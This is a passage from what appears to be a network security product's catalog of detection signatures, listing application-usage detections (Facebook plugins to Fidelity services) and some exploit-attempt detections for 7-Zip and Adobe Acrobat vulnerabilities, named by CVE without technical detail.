Last changed: sgpkg-ips-1629-5242
Description: Facebook Send Button is a Facebook Plugin that lets users send or share information about a web page to their friends on Facebook.
Back to top

Facebook-Plugins-Share-Button

About this situation: Facebook Share Button usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-656-5211
Last changed: sgpkg-ips-1629-5242
Description: Facebook Share Button is a Facebook Plugin that lets Facebook users share specific content to their friends and followers.
Back to top

Facebook-Rooms

About this situation: Facebook Rooms usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-1586-5242
Description: Facebook Rooms allows users to create and join virtual rooms to share photos, videos and notes.
Back to top

Facebook-Workplace

About this situation: Facebook Workplace usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-1586-5242
Description: Workplace by Facebook is a collaborative platform for organizations. It offers communication, voice and video calls and live video streaming.
Back to top

Factor-4-Index-Subdomain

About this situation: Application Factor-4-Index-Subdomain detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Factor 4 Index is a tool for inviting your employees to answer 64 research questions online and anonymously. The results are an indication of how the staff experiences their work and where the strengths and weaknesses of the organization lie.
Back to top

Factual

About this situation: Application Factual detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Factual is a location platform that enables personalized and contextually relevant mobile experiences by enriching mobile location signals with definitive global data. Factual real-time data stack builds and maintains data on a global scale, with Factual's core Global Places data.
Back to top

Failed OATH database backup

About this situation: Failed OATH database backup
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

Fairmont-Hotels

About this situation: Fairmont Hotels usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: Fairmont Hotels and Resorts is a Canadian-based operator of luxury hotels and resorts. Currently, Fairmont operates properties in 19 countries .
Back to top

Fairsail

About this situation: Application Fairsail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fairsail is an innovative, cloud based human resource management software and systems, designed to meet the needs of growing organizations.
Back to top

Fairwinds

About this situation: Application Fairwinds detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fairwinds Credit Union is an American member-owned credit union. Fairwinds offers a full suite of banking solutions along with the service and technology to help you to achieve financial freedom wherever you are.
Back to top

Faithful-Steward-Church-Management-Software-Solutions

About this situation: Application Faithful-Steward-Church-Management-Software-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Faithful Steward Church Management is a solution software for Managing Membership and Donations.
Back to top

Falcon-Social

About this situation: Application Falcon-Social detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Falcon Social is a communication platform built on social media management tools for listening, engagement, publishing, and analytics.
Back to top

FalconStorSoftware

About this situation: Application FalconStorSoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FalconStorSoftware is a provider of disk-based data protection. It delivers data protection solutions the availability of business-critical data.
Back to top

Fallout 3

About this situation: Endpoint Context Agent based Fallout 3
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1183-5242
Description: Fallout 3 endpoint application has been detected. Fallout 3 is a post-apocalyptic open-world adventure game.
Back to top

Fallout New Vegas

About this situation: Endpoint Context Agent based Fallout New Vegas
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-1190-5242
Last changed: sgpkg-ips-1190-5242
Description: Fallout New Vegas endpoint application has been detected. Fallout New Vegas is a post-apocalyptic open-world adventure game.
Back to top

Fandango

About this situation: Fandango usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-1098-5242
Last changed: sgpkg-ips-1238-5242
Description: Fandango is a movie related service offering movie trailers, movie reviews and ability to buy movie tickets.
Back to top

FanFueled

About this situation: Application FanFueled detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FanFueled - ticketing and social platform for live events.
Back to top

Fanurio

About this situation: Application Fanurio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fanurio is a time tracking software application.
Back to top

Farmatech-Radmin

About this situation: Farmatech Radmin traffic
Context: Application Context
Severity: 1
Tags: Protocols, Remote control
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: Farmatech Radmin usage.
Back to top

FASOTEC

About this situation: Application FASOTEC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FASOTEC provides sales and engineering services for CAD, CAM, CAE, PDM systems medical engineering service by 3D printer technology.
Back to top

Fast-React-Systems

About this situation: Application Fast-React-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fast React Systems is a supplier of software specific for the fashion industry supply chain. It solutions are designed for and used extensively by companies involved in apparel, footwear, accessories and textiles as well as associated industries.
Back to top

Fastenterprises

About this situation: Application Fastenterprises detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fast Enterprises, LLC provide the development and installation of software for government agencies.
Back to top

Fasthosts

About this situation: Application Fasthosts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fasthosts provide domain names, web hosting, email hosting, dedicated servers, cloud servers, and reseller services for both business and personal use.
Back to top

Fastly

About this situation: Fastly CDN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-1078-5242
Description: Fastly content delivery network usage has been detected.
Back to top

Fastly-Insights

About this situation: Fastly-Insights usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-1677-5242
Last changed: sgpkg-ips-1769-5242
Description: Fastly Insights is a service for network and performance monitoring.
Back to top

FastMail

About this situation: FastMail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-665-5211
Description: FastMail provides secure email hosting services, with SMTP, IMAP, POP and web access.
Back to top

FastTrack

About this situation: FastTrack traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: FastTrack is a p2p protocol.
Back to top

Fastviewer

About this situation: fastviewer usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-631-5211
Description: A remote desktop sharing application; Source FastViewer
Back to top

FAT-FINGER

About this situation: Application FAT-FINGER detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FAT FINGER automates workflows and provides real-time operational analytics to management.
Back to top

Fathom

About this situation: Application Fathom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fathom Information Design helps clients understand and express complex data through information graphics, interactive tools, and software for installations, the web, and mobile devices.
Back to top

Fatwallet

About this situation: FatWallet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: FatWallet allows users to publish deals and rebate offers on products and services.
Back to top

Faxit-Nice

About this situation: FaxIt Nice usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: FaxIt Nice provides fast, reliable and cheap online faxing, so waiting around is no longer necessary.You can queue up as many faxes as you want simultaneously, it is like having an infinite number of fax machines.
Back to top

Fc2-Blog

About this situation: FC2 Blog usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-687-5211
Description: This site is a global blog that allows users to write and read content.
Back to top

FCM-Client-Portal

About this situation: Application FCM-Client-Portal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FCm Travel Solutions is the flagship global corporate travel business of the Flight Centre Travel Group
Back to top

FCS-live

About this situation: Application FCS-live detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FCS-live provides risk management software.
Back to top

Federated-Media

About this situation: Federated Media usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-602-5211
Description: Federated Media is a web advertising and statistic collection service.
Back to top

FedEx

About this situation: FedEx usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Description: FedEx Corporation is a global courier delivery company.
Back to top

FeedbackServer

About this situation: Application FeedbackServer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Feedback Server is an asp.net web based survey software and form builder to manage and deploy without any technical knowledge web based surveys across your organization to gather important feedback from your customers, employees, students or website visitors and let you to analyze the collected data.
Back to top

Feedbackstr

About this situation: Application Feedbackstr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Feedbackstr empowers your company to simply and directly ask their customers through easy and quick surveys from a phone, tablet, or computer about their products and services to measure and manage customer satisfaction and customer experience.
Back to top

Feedblitz

About this situation: Application Feedblitz detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FeedBlitz is the only all-in-one service combining email marketing, social media and RSS feed management. FeedBlitz's set and forget email service takes the pain out of email marketing and newsletter updates. Automatically create mailings from any RSS feed, easily manage multiple mailing lists, filter by content preferences, and more.
Back to top

Feedity

About this situation: Feedity usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Feedity extracts data from public webpages to create auto-updating RSS feeds.
Back to top

Feedly

About this situation: Feedly usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Feedly is a news aggregator application for various web browsers and mobile devices running iOS and Android, also available as a cloud-based service. It compiles news feeds from a variety of online sources for the user to customize and share with others.
Back to top

FeedMyInbox

About this situation: Application FeedMyInbox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Feedmyinbox is an application designed to deliver RSS feeds to a user's email inbox.
Back to top

Feitian-Technologies

About this situation: Application Feitian-Technologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Feitian's major business covers Software Protection, Strong Authentication, Smartcard COS and Peripherals. Feitian is dedicated to being innovator of smartcard and chip operating system based security technologies and applications.
Back to top

Feng-Office

About this situation: Feng Office usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Feng Office combines all the features necessary to be able to manage projects, customers, tasks, documents, communication and collaboration with co-workers, customers and vendors, billing, schedule meetings and events, all into one platform.
Back to top

Fetch.io

About this situation: FETCH.IO usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users todownload and stream media files from multiple sources.
Back to top

FetchApp

About this situation: Application FetchApp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FetchApp allows to sell and digitally deliver downloadable goods.
Back to top

Fetion-Instant-Messaging

About this situation: Fetion Instant Messaging usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking
First detected in: sgpkg-ips-529-5211
Last changed: sgpkg-ips-628-5211
Description: Fetion is a Chinese Instant Messaging Computer Program which allows users to communicate with each other in real time.
Back to top

Fetion-Instant-Messaging-File-Transfer

About this situation: Fetion Instant Messaging file transfer detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-628-5211
Description: Fetion is a Chinese Instant Messaging Computer Program which allows users to communicate with each other in real time.
Back to top

Fever

About this situation: Application Fever detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fever takes the temperature of your slice of the web and shows you what's hot.
Back to top

FG-Receivables-Manager

About this situation: Application FG-Receivables-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FG Receivables Manager is designed to help you spend less time on receivables and get paid faster. Send reminders with a single click and collect on accounts that do not respond.
Back to top

fi360-Designees

About this situation: Application fi360-Designees detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: fi360 solutions include fiduciary education
Back to top

Fiabee

About this situation: Application Fiabee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fiabee: Selective sync across all of your devices. From any device you can access all you files
Back to top

Fidelity-Investments

About this situation: Application Fidelity-Investments detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fidelity Investments provides financial services and investment resources that help users meet financial objectives.
Back to top

Fidelity-NetBenefits

About this situation: Application Fidelity-NetBenefits detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fidelity NetBenefits makes overseeing retirement accounts by exploring online resources, reviewing your investments, managing your accounts, accessing planning tools and learning resources.
Back to top

Fidessa

About this situation: Application Fidessa detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fidessa provide exceptional trading, investment and information solutions for the world's financial community. Fidessa is a business with scale, resilience, ambition and expertise.
Back to top

FieldAware

About this situation: Application FieldAware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FieldAware made-for-mobile, cloud-based software was designed from the ground up to provide ease of use. Our software was architected as a mobile platform, with no incumbent legacy technologies to modify or migrate from.
Back to top

Fieldglass

About this situation: Application Fieldglass detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Fieldglass is a software company that provides a Vendor Management System (VMS) called Fieldglass VMS, a cloud-based technology used to procure and manage the non-employee workforce, including contingent workers and services such as Statement of Work (SOW) projects, offshore labor and independent contractors.
Back to top

FieldLocate

About this situation: Application FieldLocate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FieldLocate automates manual, time-consuming scheduling, invoicing and recordkeeping processes so users gain real-time, end-to-end visibility of their entire field service operations - from field workers schedules and location to job statuses and inventory levels.
Back to top

FieldLogix

About this situation: Application FieldLogix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FieldLogix delivers driving intelligence for fleets of cars and trucks. Its GPS tracking system and management solution can train drivers on driving techniques to reduce fuel consumption.
Back to top

FieldService360

About this situation: Application FieldService360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FieldService360 offers a complete cloud-based, collaborative and mobile solution to begin the journey to an optimized and more productive Field Service operation that delivers greater customer satisfaction.
Back to top

FieldSync-Health

About this situation: Application FieldSync-Health detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: FieldSync Health is an eHealth service for providers that deliver and manage care for individuals who need assistance. Through FieldSync Health, professionals, and direct care providers can set up program plans, track progress, communicate, view medical information and generate reports in real time.
Back to top

File Download Servers

About this situation: Web servers whose primary function is to deliver files for download.
Context: URL Application Context
Severity: 1
Tags: Miscellaneous
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Web servers whose primary function is to deliver files for download.
Back to top

File reputation updated

About this situation: A scanner is finished with a file and has updated the reputation of the file.
Context: File Filtering
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Description: A scanner is finished with a file and has updated the reputation of the file..
Back to top

File-Archive-Member_Office-Open-XML-Application-Properties-Part

About this situation: XML file content
Context: Archive Member Situation
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Detected XML content from an archive member file.
Back to top

File-Archive-Member_Office-Open-XML-Core-Properties-Part

About this situation: XML file content
Context: Archive Member Situation
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Detected XML content from an archive member file.
Back to top

File-Archive-Member_XML

About this situation: XML file content
Context: Archive Member Situation
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Description: Detected XML content from an archive member file.
Back to top

File-Binary_7-Zip-7z-File-Ppmd-Properties-Parsing-Integer-Underflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in 7-Zip detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, 7-Zip, CVE2023, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Vulnerability: 7-Zip-7z-File-Ppmd-Properties-Parsing-Integer-Underflow-Vulnerability
Description:
Back to top

File-Binary_7-Zip-Squashfs-File-Uidtable-Parsing-Buffer-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in 7-Zip detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, 7-Zip, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: 7-Zip-Squashfs-File-Uidtable-Parsing-Buffer-Overflow-Vulnerability
Description:
Back to top

File-Binary_7-Zip-Zstandard-Decompression-Integer-Underflow-CVE-2024-11477

About this situation: An attempt to exploit a vulnerability in 7-Zip detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, 7-Zip, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1858-5242
Last changed: sgpkg-ips-1858-5242
Vulnerability: 7-Zip-Zstandard-Decompression-Integer-Underflow-CVE-2024-11477
Description:
Back to top

File-Binary_ACE-Archive

About this situation: ACE archive file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, WinAce, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_Adobe-Acrobat-EMF-Emfplusdrawlines-Count-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1086-5242
Last changed: sgpkg-ips-1617-5242
Vulnerability: Adobe-Acrobat-EMF-Emfplusdrawlines-Count-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Adobe-Acrobat-EMF-EMR_alphablend-CVE-2018-12789-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1689-5242
Vulnerability: File-Binary_Adobe-Acrobat-EMF-EMR_alphablend-CVE-2018-12789-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-EMF-BMP-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1689-5242
Vulnerability: Adobe-Acrobat-Imageconversion-EMF-BMP-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-EMF-BMP-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1071-5242
Vulnerability: Adobe-Acrobat-Imageconversion-EMF-BMP-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Emfplus-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1028-5242
Vulnerability: Adobe-Acrobat-Imageconversion-EMF-Emfplus-Heap-Based-Buffer-Overflow
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Emfplusdrawbeziers-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1136-5242
Last changed: sgpkg-ips-1689-5242
Vulnerability: Adobe-Acrobat-Imageconversion-EMF-Emfplusdrawbeziers-Type-Confusion
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Emfpluspath-Object-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1081-5242
Last changed: sgpkg-ips-1081-5242
Vulnerability: Adobe-Acrobat-Imageconversion-EMF-Emfpluspath-Object-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchblt-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1607-5242
Vulnerability: Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchblt-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchdibits-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1050-5242
Vulnerability: Adobe-Acrobat-Imageconversion-EMF-EMR_Stretchdibits-Heap-Based-Buffer-Overflow
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1689-5242
Vulnerability: Adobe-Acrobat-Imageconversion-EMF-Heap-Based-Buffer-Overflow
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1042-5242
Vulnerability: Adobe-Acrobat-Imageconversion-EMF-Integer-Overflow
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-991-5242
Last changed: sgpkg-ips-991-5242
Vulnerability: Adobe-Acrobat-Imageconversion-EMF-Parsing-Integer-Overflow
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-EMF-Parsing-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-980-5242
Vulnerability: Adobe-Acrobat-Imageconversion-EMF-Parsing-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-Emfplus-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1052-5242
Last changed: sgpkg-ips-1611-5242
Vulnerability: Adobe-Acrobat-Imageconversion-Emfplus-Heap-Based-Buffer-Overflow
Description:
Back to top

File-Binary_Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Other Binary File Stream
